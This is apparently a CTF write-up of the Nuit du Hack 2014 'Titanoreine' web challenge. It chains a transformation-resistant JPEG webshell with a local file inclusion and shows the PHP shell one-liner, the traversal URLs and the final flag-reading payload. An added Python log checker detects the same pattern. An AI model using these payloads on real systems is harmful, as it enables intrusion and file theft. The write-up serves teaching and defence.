Artificial truth

The more you see, the less you believe.


Nuit du Hack 2014 Quals - Titanoreine (web 300)
Sun 06 April 2014

Titanoreine was a fun challenge. We were provided a website where we could upload some pictures. There was also an obvious LFI. One might think that you just have to put some PHP like <?php system($_GET['c']);?> into the metadata field to get code execution. The twist here was that the image was processed by php-gd, trashing our precious metadata.

Notfound, from the hexpresso team, reminded me that one of the organizers was virtualabs. I vaguely remembered that he wrote an article about transformation-resistant pictures to get a PHP shell. He even provides a script to generate the images. What a coincidence.

First we tried to use the system command in our payload, but it seemed that it was not allowed. We switched to eval. By the way, thank you PHP for providing so many functions to get code execution.

Here is the image that we used (image: webshelljpg).

The payload is roughly equivalent to <?php system($_GET['c']);?>.

Feel free to transform it with php-gd at quality 98 (the one used by the challenge; by the way, thanks to the teams that used the exploit-98.jpg filename for the hint ;)) and look at the result with your favorite hex editor to see our payload survive.

We lost quite some time trying to get this kind of URL working (the second ? is not a query-string separator, it is just part of the lang value, so c never reaches $_GET):

http://gallery.nuitduhack.com/index.php?lang=../../../includes/ble.jpg?c=echo 1;

Here is the correct form:

http://gallery.nuitduhack.com/index.php?c=echo 1;&lang=../../../includes/ble.jpg

or

http://gallery.nuitduhack.com/index.php?lang=../../../includes/ble.jpg&c=echo 1;

This was the "Omg plz kill me" moment of the ctf.
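As an added example (not from the original post), here is a small Python checker that splits a request target the way PHP builds $_GET, which shows why the first URL form never delivers c, and then runs that logic over a few constructed access-log lines to flag the traversal-in-lang plus code-in-c pattern from this challenge. The log lines and client IPs are constructed; the request targets mirror the URL forms above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post); the
# request targets mirror the URL forms discussed in the write-up.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Apr/2014:14:02:11 +0200] "GET /index.php?lang=en HTTP/1.1" 200 512
10.0.0.7 - - [06/Apr/2014:14:03:40 +0200] "GET /index.php?lang=../../../includes/ble.jpg?c=echo%201; HTTP/1.1" 200 87
10.0.0.7 - - [06/Apr/2014:14:05:02 +0200] "GET /index.php?lang=../../../includes/ble.jpg&c=echo%20file_get_contents%28%27./includes/X~unsuspicious~X%27%29; HTTP/1.1" 200 120
10.0.0.9 - - [06/Apr/2014:14:06:15 +0200] "GET /index.php?lang=fr&c=1 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/')
TRAVERSAL = re.compile(r'(^|/)\.\.(/|$)')   # a "../" or "/.." path step
CALL_OR_TAG = re.compile(r'\w+\s*\(|<\?')    # foo(...) or a PHP open tag

def php_get_params(target):
    """Equivalent of PHP's $_GET: only the first '?' starts the query string,
    pairs split on '&', last duplicate key wins; a second '?' is just data."""
    query = target.partition('?')[2]
    params = {}
    for pair in query.split('&'):
        if pair:
            key, _, value = pair.partition('=')
            params[unquote_plus(key)] = unquote_plus(value)
    return params

def assess_request(target):
    """Return findings for one request target (empty list when benign)."""
    params = php_get_params(target)
    lang, code = params.get('lang', ''), params.get('c', '')
    findings = []
    if TRAVERSAL.search(lang):
        findings.append('traversal in lang')
    if '?' in lang:
        findings.append('second ? swallowed into lang, c never reaches $_GET')
    if CALL_OR_TAG.search(code):
        findings.append('php code in c')
    return findings

def scan_log(text):
    """Return (client_ip, target, findings) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.search(line)
        if match:
            findings = assess_request(match.group('target'))
            if findings:
                hits.append((line.split()[0], match.group('target'), findings))
    return hits
```

Running scan_log(SAMPLE_LOG) flags only the two 10.0.0.7 requests; the first of them carries no c at all, which is exactly the trap described above.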

Anyway, we used glob and file_get_contents to get the flag.

(screenshot: glob output)

Here is our final payload: http://gallery.nuitduhack.com/index.php?c=echo%20file_get_contents%28%27./includes/X~unsuspicious~X%27%29;&lang=../../../includes/ble.jpg

(screenshot: flag)

flag: WhyAreHemorrhoidsNotCalledAssteroids